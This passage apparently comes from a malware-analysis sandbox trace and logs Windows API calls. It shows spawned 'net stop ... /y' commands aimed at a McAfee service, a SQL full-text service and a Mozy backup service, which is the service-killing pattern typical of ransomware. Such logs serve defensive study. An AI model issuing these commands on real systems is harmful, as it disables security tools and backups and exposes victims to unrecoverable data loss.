(uFlags=0x0, uBytes=0x4) returned 0x256288 [0215.678] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x256288, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n%", lpUsedDefaultChar=0x0) returned 2 [0215.678] WriteFile (in: hFile=0x26c, lpBuffer=0x256288, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfc78, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfc78, lpOverlapped=0x0) returned 0 [0215.678] LocalFree (hMem=0x256288) returned 0x0 [0215.678] NetApiBufferFree (Buffer=0x251c60) returned 0x0 [0215.678] NetApiBufferFree (Buffer=0x251c78) returned 0x0 [0215.679] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfevtp /y" [0215.679] exit (_Code=2) Process: id = "346" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6d25000" os_pid = "0x6ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop msftesql$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 519 os_tid = 0x410 Process: id = "347" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x51804000" os_pid = "0xb1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "346" os_parent_pid = "0x6ac" cmd_line = "C:\\Windows\\system32\\net1 stop msftesql$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 520 os_tid = 0x6d0 [0215.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fa6c | out: lpSystemTimeAsFileTime=0x28fa6c*(dwLowDateTime=0x49d69940, dwHighDateTime=0x1d57a87)) [0215.830] GetCurrentProcessId () returned 0xb1c [0215.830] GetCurrentThreadId () returned 0x6d0 [0215.830] GetTickCount () returned 0x116f835 [0215.830] QueryPerformanceCounter (in: lpPerformanceCount=0x28fa64 | out: lpPerformanceCount=0x28fa64*=33611473338) returned 1 [0215.830] GetModuleHandleA (lpModuleName=0x0) returned 0xe00000 [0215.830] __set_app_type (_Type=0x1) [0215.830] __p__fmode () returned 0x74eb31f4 [0215.830] __p__commode () returned 0x74eb31fc [0215.831] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe0ffe6) returned 0x0 [0215.831] __getmainargs (in: _Argc=0xe19064, _Argv=0xe1906c, _Env=0xe19068, _DoWildCard=0, _StartInfo=0xe19024 | out: _Argc=0xe19064, _Argv=0xe1906c, _Env=0xe19068) returned 0 [0215.831] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.831] GetConsoleOutputCP () returned 0x1b5 [0215.831] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe19080 | out: lpCPInfo=0xe19080) returned 1 [0215.831] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.834] sprintf_s (in: _DstBuf=0x28fa24, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0215.834] setlocale (category=0, locale=".437") returned="English_United States.437" [0215.836] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0215.836] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0215.836] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop msftesql$PROD /y" [0215.837] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0215.837] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x0, Size=0x6e) returned 0x323c10 [0215.837] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0215.837] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28f9f4 | out: Buffer=0x28f9f4*=0x321c70) returned 0x0 [0215.837] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28f9f4 | out: Buffer=0x28f9f4*=0x321c88) returned 0x0 [0215.837] _fileno (_File=0x74eb2900) returned -2 [0215.837] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0215.837] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0215.837] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0215.837] _wcsicmp (_String1="config", _String2="stop") returned -16 [0215.837] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0215.837] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0215.837] _wcsicmp (_String1="file", _String2="stop") returned -13 [0215.837] _wcsicmp (_String1="files", _String2="stop") returned -13 [0215.837] _wcsicmp (_String1="group", _String2="stop") returned -12 [0215.837] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0215.837] _wcsicmp (_String1="help", _String2="stop") returned -11 [0215.837] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0215.838] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0215.838] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0215.838] _wcsicmp (_String1="session", _String2="stop") returned -15 [0215.838] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0215.838] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0215.838] _wcsicmp (_String1="share", _String2="stop") returned -12 [0215.838] _wcsicmp (_String1="start", _String2="stop") returned -14 [0215.838] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0215.838] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0215.838] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0215.838] _wcsicmp (_String1="accounts", _String2="msftesql$PROD") returned -12 [0215.838] _wcsicmp (_String1="computer", _String2="msftesql$PROD") returned -10 [0215.838] _wcsicmp (_String1="config", _String2="msftesql$PROD") returned -10 [0215.838] _wcsicmp (_String1="continue", _String2="msftesql$PROD") returned -10 [0215.838] _wcsicmp (_String1="cont", _String2="msftesql$PROD") returned -10 [0215.838] _wcsicmp (_String1="file", _String2="msftesql$PROD") returned -7 [0215.838] _wcsicmp (_String1="files", _String2="msftesql$PROD") returned -7 [0215.838] _wcsicmp (_String1="group", _String2="msftesql$PROD") returned -6 [0215.838] _wcsicmp (_String1="groups", _String2="msftesql$PROD") returned -6 [0215.838] _wcsicmp (_String1="help", _String2="msftesql$PROD") returned -5 [0215.838] _wcsicmp (_String1="helpmsg", _String2="msftesql$PROD") returned -5 [0215.838] _wcsicmp (_String1="localgroup", _String2="msftesql$PROD") returned -1 [0215.838] _wcsicmp (_String1="pause", _String2="msftesql$PROD") returned 3 [0215.838] _wcsicmp (_String1="session", _String2="msftesql$PROD") returned 6 [0215.838] _wcsicmp (_String1="sessions", _String2="msftesql$PROD") returned 6 [0215.838] _wcsicmp (_String1="sess", _String2="msftesql$PROD") returned 6 [0215.838] _wcsicmp (_String1="share", _String2="msftesql$PROD") returned 6 [0215.838] _wcsicmp (_String1="start", _String2="msftesql$PROD") returned 6 [0215.838] _wcsicmp (_String1="stats", _String2="msftesql$PROD") returned 6 [0215.838] _wcsicmp (_String1="statistics", _String2="msftesql$PROD") returned 6 [0215.838] _wcsicmp (_String1="stop", _String2="msftesql$PROD") returned 6 [0215.838] _wcsicmp (_String1="time", _String2="msftesql$PROD") returned 7 [0215.838] _wcsicmp (_String1="user", _String2="msftesql$PROD") returned 8 [0215.838] _wcsicmp (_String1="users", _String2="msftesql$PROD") returned 8 [0215.838] _wcsicmp (_String1="msg", _String2="msftesql$PROD") returned 1 [0215.838] _wcsicmp (_String1="messenger", _String2="msftesql$PROD") returned -14 [0215.838] _wcsicmp (_String1="receiver", _String2="msftesql$PROD") returned 5 [0215.838] _wcsicmp (_String1="rcv", _String2="msftesql$PROD") returned 5 [0215.838] _wcsicmp (_String1="netpopup", _String2="msftesql$PROD") returned 1 [0215.839] _wcsicmp (_String1="redirector", _String2="msftesql$PROD") returned 5 [0215.839] _wcsicmp (_String1="redir", _String2="msftesql$PROD") returned 5 [0215.839] _wcsicmp (_String1="rdr", _String2="msftesql$PROD") returned 5 [0215.839] _wcsicmp (_String1="workstation", _String2="msftesql$PROD") returned 10 [0215.839] _wcsicmp (_String1="work", _String2="msftesql$PROD") returned 10 [0215.839] _wcsicmp (_String1="wksta", _String2="msftesql$PROD") returned 10 [0215.839] _wcsicmp (_String1="prdr", _String2="msftesql$PROD") returned 3 [0215.839] _wcsicmp (_String1="devrdr", _String2="msftesql$PROD") returned -9 [0215.839] _wcsicmp (_String1="lanmanworkstation", _String2="msftesql$PROD") returned -1 [0215.839] _wcsicmp (_String1="server", _String2="msftesql$PROD") returned 6 [0215.839] _wcsicmp (_String1="svr", _String2="msftesql$PROD") returned 6 [0215.839] _wcsicmp (_String1="srv", _String2="msftesql$PROD") returned 6 [0215.839] _wcsicmp (_String1="lanmanserver", _String2="msftesql$PROD") returned -1 [0215.839] _wcsicmp (_String1="alerter", _String2="msftesql$PROD") returned -12 [0215.839] _wcsicmp (_String1="netlogon", _String2="msftesql$PROD") returned 1 [0215.839] _wcsupr (in: _String="msftesql$PROD" | out: _String="MSFTESQL$PROD") returned="MSFTESQL$PROD" [0215.839] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3254d0 [0215.842] GetServiceKeyNameW (in: hSCManager=0x3254d0, lpDisplayName="MSFTESQL$PROD", lpServiceName=0xe1aaf0, lpcchBuffer=0x28f990 | out: lpServiceName="", lpcchBuffer=0x28f990) returned 0 [0215.842] _wcsicmp (_String1="msg", _String2="MSFTESQL$PROD") returned 1 [0215.842] _wcsicmp (_String1="messenger", _String2="MSFTESQL$PROD") returned -14 [0215.842] _wcsicmp (_String1="receiver", _String2="MSFTESQL$PROD") returned 5 [0215.842] _wcsicmp (_String1="rcv", _String2="MSFTESQL$PROD") returned 5 [0215.842] _wcsicmp (_String1="redirector", _String2="MSFTESQL$PROD") returned 5 [0215.842] _wcsicmp (_String1="redir", _String2="MSFTESQL$PROD") returned 5 [0215.842] _wcsicmp (_String1="rdr", _String2="MSFTESQL$PROD") returned 5 [0215.842] _wcsicmp (_String1="workstation", _String2="MSFTESQL$PROD") returned 10 [0215.842] _wcsicmp (_String1="work", _String2="MSFTESQL$PROD") returned 10 [0215.842] _wcsicmp (_String1="wksta", _String2="MSFTESQL$PROD") returned 10 [0215.842] _wcsicmp (_String1="prdr", _String2="MSFTESQL$PROD") returned 3 [0215.842] _wcsicmp (_String1="devrdr", _String2="MSFTESQL$PROD") returned -9 [0215.842] _wcsicmp (_String1="lanmanworkstation", _String2="MSFTESQL$PROD") returned -1 [0215.843] _wcsicmp (_String1="server", _String2="MSFTESQL$PROD") returned 6 [0215.843] _wcsicmp (_String1="svr", _String2="MSFTESQL$PROD") returned 6 [0215.843] _wcsicmp (_String1="srv", _String2="MSFTESQL$PROD") returned 6 [0215.843] _wcsicmp (_String1="lanmanserver", _String2="MSFTESQL$PROD") returned -1 [0215.843] _wcsicmp (_String1="alerter", _String2="MSFTESQL$PROD") returned -12 [0215.843] _wcsicmp (_String1="netlogon", _String2="MSFTESQL$PROD") returned 1 [0215.843] NetServiceControl (in: servername=0x0, service="MSFTESQL$PROD", opcode=0x0, arg=0x0, bufptr=0x28f98c | out: bufptr=0x28f98c) returned 0x889 [0215.844] wcscpy_s (in: _Destination=0xe1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0215.844] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0215.844] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe1b338, nSize=0x800, Arguments=0xe19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0215.845] GetFileType (hFile=0x26c) returned 0x3 [0215.845] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x324000 [0215.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x324000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0215.846] WriteFile (in: hFile=0x26c, lpBuffer=0x324000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x28f8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28f8cc, lpOverlapped=0x0) returned 0 [0215.846] LocalFree (hMem=0x324000) returned 0x0 [0215.846] GetFileType (hFile=0x26c) returned 0x3 [0215.846] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3262a8 [0215.846] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n2", lpUsedDefaultChar=0x0) returned 2 [0215.846] WriteFile (in: hFile=0x26c, lpBuffer=0x3262a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28f8cc, lpOverlapped=0x0) returned 0 [0215.846] LocalFree (hMem=0x3262a8) returned 0x0 [0215.846] _ultow (in: _Dest=0x889, _Radix=2685180 | out: _Dest=0x889) returned="2185" [0215.846] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe1b338, nSize=0x800, Arguments=0xe19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0215.846] GetFileType (hFile=0x26c) returned 0x3 [0215.846] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3262a8 [0215.846] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3262a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0215.846] WriteFile (in: hFile=0x26c, lpBuffer=0x3262a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x28f8d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28f8d8, lpOverlapped=0x0) returned 0 [0215.846] LocalFree (hMem=0x3262a8) returned 0x0 [0215.846] GetFileType (hFile=0x26c) returned 0x3 [0215.846] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3262a8 [0215.846] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n2", lpUsedDefaultChar=0x0) returned 2 [0215.846] WriteFile (in: hFile=0x26c, lpBuffer=0x3262a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f8d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28f8d8, lpOverlapped=0x0) returned 0 [0215.846] LocalFree (hMem=0x3262a8) returned 0x0 [0215.847] NetApiBufferFree (Buffer=0x321c70) returned 0x0 [0215.847] NetApiBufferFree (Buffer=0x321c88) returned 0x0 [0215.847] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop msftesql$PROD /y" [0215.847] exit (_Code=2) Process: id = "348" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x162a000" os_pid = "0xbe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop mozyprobackup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 521 os_tid = 0x69c Process: id = "349" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x61da5000" os_pid = "0x1e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "348" os_parent_pid = "0xbe8" cmd_line = "C:\\Windows\\system32\\net1 stop mozyprobackup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 522 os_tid = 0x7a8 [0216.027] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ffac0 | out: lpSystemTimeAsFileTime=0x1ffac0*(dwLowDateTime=0x49f329c0, dwHighDateTime=0x1d57a87)) [0216.027] GetCurrentProcessId () returned 0x1e8 [0216.027] GetCurrentThreadId () returned 0x7a8 [0216.027] GetTickCount () returned 0x116f8f0 [0216.027] QueryPerformanceCounter (in: lpPerformanceCount=0x1ffab8 | out: lpPerformanceCount=0x1ffab8*=33631171092) returned 1 [0216.027] GetModuleHandleA (lpModuleName=0x0) returned 0xc30000 [0216.027] __set_app_type (_Type=0x1) [0216.027] __p__fmode () returned 0x74eb31f4 [0216.027] __p__commode () returned 0x74eb31fc [0216.028] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc3ffe6) returned 0x0 [0216.028] __getmainargs (in: _Argc=0xc49064, _Argv=0xc4906c, _Env=0xc49068, _DoWildCard=0, _StartInfo=0xc49024 | out: _Argc=0xc49064, _Argv=0xc4906c, _Env=0xc49068) returned 0 [0216.028] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.028] GetConsoleOutputCP () returned 0x1b5 [0216.028] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc49080 | out: lpCPInfo=0xc49080) returned 1 [0216.028] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.031] sprintf_s (in: _DstBuf=0x1ffa78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0216.031] setlocale (category=0, locale=".437") returned="English_United States.437" [0216.034] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0216.034] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0216.034] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mozyprobackup /y" [0216.034] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ff844, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0216.034] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6e) returned 0x453c10 [0216.034] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0216.034] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ffa48 | out: Buffer=0x1ffa48*=0x451c70) returned 0x0 [0216.034] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ffa48 | out: Buffer=0x1ffa48*=0x451c88) returned 0x0 [0216.034] _fileno (_File=0x74eb2900) returned -2 [0216.034] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0216.034] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0216.034] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0216.034] _wcsicmp (_String1="config", _String2="stop") returned -16 [0216.034] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0216.034] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0216.034] _wcsicmp (_String1="file", _String2="stop") returned -13 [0216.034] _wcsicmp (_String1="files", _String2="stop") returned -13 [0216.034] _wcsicmp (_String1="group", _String2="stop") returned -12 [0216.035] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0216.035] _wcsicmp (_String1="help", _String2="stop") returned -11 [0216.035] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0216.035] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0216.035] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0216.035] _wcsicmp (_String1="session", _String2="stop") returned -15 [0216.035] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0216.035] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0216.035] _wcsicmp (_String1="share", _String2="stop") returned -12 [0216.035] _wcsicmp (_String1="start", _String2="stop") returned -14 [0216.035] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0216.035] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0216.035] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0216.035] _wcsicmp (_String1="accounts", _String2="mozyprobackup") returned -12 [0216.035] _wcsicmp (_String1="computer", _String2="mozyprobackup") returned -10 [0216.035] _wcsicmp (_String1="config", _String2="mozyprobackup") returned -10 [0216.035] _wcsicmp (_String1="continue", _String2="mozyprobackup") returned -10 [0216.035] _wcsicmp (_String1="cont", _String2="mozyprobackup") returned -10 [0216.035] _wcsicmp (_String1="file", _String2="mozyprobackup") returned -7 [0216.035] _wcsicmp (_String1="files", _String2="mozyprobackup") returned -7 [0216.035] _wcsicmp (_String1="group", _String2="mozyprobackup") returned -6 [0216.035] _wcsicmp (_String1="groups", _String2="mozyprobackup") returned -6 [0216.035] _wcsicmp (_String1="help", _String2="mozyprobackup") returned -5 [0216.035] _wcsicmp (_String1="helpmsg", _String2="mozyprobackup") returned -5 [0216.035] _wcsicmp (_String1="localgroup", _String2="mozyprobackup") returned -1 [0216.035] _wcsicmp (_String1="pause", _String2="mozyprobackup") returned 3 [0216.035] _wcsicmp (_String1="session", _String2="mozyprobackup") returned 6 [0216.035] _wcsicmp (_String1="sessions", _String2="mozyprobackup") returned 6 [0216.035] _wcsicmp (_String1="sess", _String2="mozyprobackup") returned 6 [0216.035] _wcsicmp (_String1="share", _String2="mozyprobackup") returned 6 [0216.035] _wcsicmp (_String1="start", _String2="mozyprobackup") returned 6 [0216.035] _wcsicmp (_String1="stats", _String2="mozyprobackup") returned 6 [0216.035] _wcsicmp (_String1="statistics", _String2="mozyprobackup") returned 6 [0216.035] _wcsicmp (_String1="stop", _String2="mozyprobackup") returned 6 [0216.035] _wcsicmp (_String1="time", _String2="mozyprobackup") returned 7 [0216.035] _wcsicmp (_String1="user", _String2="mozyprobackup") returned 8 [0216.035] _wcsicmp (_String1="users", _String2="mozyprobackup") returned 8 [0216.036] _wcsicmp (_String1="msg", _String2="mozyprobackup") returned 4 [0216.036] _wcsicmp (_String1="messenger", _String2="mozyprobackup") returned -10 [0216.036] _wcsicmp (_String1="receiver", _String2="mozyprobackup") returned 5 [0216.036] _wcsicmp (_String1="rcv", _String2="mozyprobackup") returned 5 [0216.036] _wcsicmp (_String1="netpopup", _String2="mozyprobackup") returned 1 [0216.036] _wcsicmp (_String1="redirector", _String2="mozyprobackup") returned 5 [0216.036] _wcsicmp (_String1="redir", _String2="mozyprobackup") returned 5 [0216.036] _wcsicmp (_String1="rdr", _String2="mozyprobackup") returned 5 [0216.036] _wcsicmp (_String1="workstation", _String2="mozyprobackup") returned 10 [0216.036] _wcsicmp (_String1="work", _String2="mozyprobackup") returned 10 [0216.036] _wcsicmp (_String1="wksta", _String2="mozyprobackup") returned 10 [0216.036] _wcsicmp (_String1="prdr", _String2="mozyprobackup") returned 3 [0216.036] _wcsicmp (_String1="devrdr", _String2="mozyprobackup") returned -9 [0216.036] _wcsicmp (_String1="lanmanworkstation", _String2="mozyprobackup") returned -1 [0216.036] _wcsicmp (_String1="server", _String2="mozyprobackup") returned 6 [0216.036] _wcsicmp (_String1="svr", _String2="mozyprobackup") returned 6 [0216.036] _wcsicmp (_String1="srv", _String2="mozyprobackup") returned 6 [0216.036] _wcsicmp (_String1="lanmanserver", _String2="mozyprobackup") returned -1 [0216.036] _wcsicmp (_String1="alerter", _String2="mozyprobackup") returned -12 [0216.036] _wcsicmp (_String1="netlogon", _String2="mozyprobackup") returned 1 [0216.036] _wcsupr (in: _String="mozyprobackup" | out: _String="MOZYPROBACKUP") returned="MOZYPROBACKUP" [0216.036] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4554d0 [0216.039] GetServiceKeyNameW (in: hSCManager=0x4554d0, lpDisplayName="MOZYPROBACKUP", lpServiceName=0xc4aaf0, lpcchBuffer=0x1ff9e4 | out: lpServiceName="", lpcchBuffer=0x1ff9e4) returned 0 [0216.039] _wcsicmp (_String1="msg", _String2="MOZYPROBACKUP") returned 4 [0216.039] _wcsicmp (_String1="messenger", _String2="MOZYPROBACKUP") returned -10 [0216.039] _wcsicmp (_String1="receiver", _String2="MOZYPROBACKUP") returned 5 [0216.039] _wcsicmp (_String1="rcv", _String2="MOZYPROBACKUP") returned 5 [0216.039] _wcsicmp (_String1="redirector", _String2="MOZYPROBACKUP") returned 5 [0216.040] _wcsicmp (_String1="redir", _String2="MOZYPROBACKUP") returned 5 [0216.040] _wcsicmp (_String1="rdr", _String2="MOZYPROBACKUP") returned 5 [0216.040] _wcsicmp (_String1="workstation", _String2="MOZYPROBACKUP") returned 10 [0216.040] _wcsicmp (_String1="work", _String2="MOZYPROBACKUP") returned 10 [0216.040] _wcsicmp (_String1="wksta", _String2="MOZYPROBACKUP") returned 10 [0216.040] _wcsicmp (_String1="prdr", _String2="MOZYPROBACKUP") returned 3 [0216.040] _wcsicmp (_String1="devrdr", _String2="MOZYPROBACKUP") returned -9 [0216.040] _wcsicmp (_String1="lanmanworkstation", _String2="MOZYPROBACKUP") returned -1 [0216.040] _wcsicmp (_String1="server", _String2="MOZYPROBACKUP") returned 6 [0216.040] _wcsicmp (_String1="svr", _String2="MOZYPROBACKUP") returned 6 [0216.040] _wcsicmp (_String1="srv", _String2="MOZYPROBACKUP") returned 6 [0216.040] _wcsicmp (_String1="lanmanserver", _String2="MOZYPROBACKUP") returned -1 [0216.040] _wcsicmp (_String1="alerter", _String2="MOZYPROBACKUP") returned -12 [0216.040] _wcsicmp (_String1="netlogon", _String2="MOZYPROBACKUP") returned 1 [0216.040] NetServiceControl (in: servername=0x0, service="MOZYPROBACKUP", opcode=0x0, arg=0x0, bufptr=0x1ff9e0 | out: bufptr=0x1ff9e0) returned 0x889 [0216.041] wcscpy_s (in: _Destination=0xc4a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0216.041] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0216.041] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc4b338, nSize=0x800, Arguments=0xc49dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0216.043] GetFileType (hFile=0x26c) returned 0x3 [0216.043] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x454000 [0216.043] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x454000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0216.043] WriteFile (in: hFile=0x26c, lpBuffer=0x454000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ff920, lpOverlapped=0x0 | out: 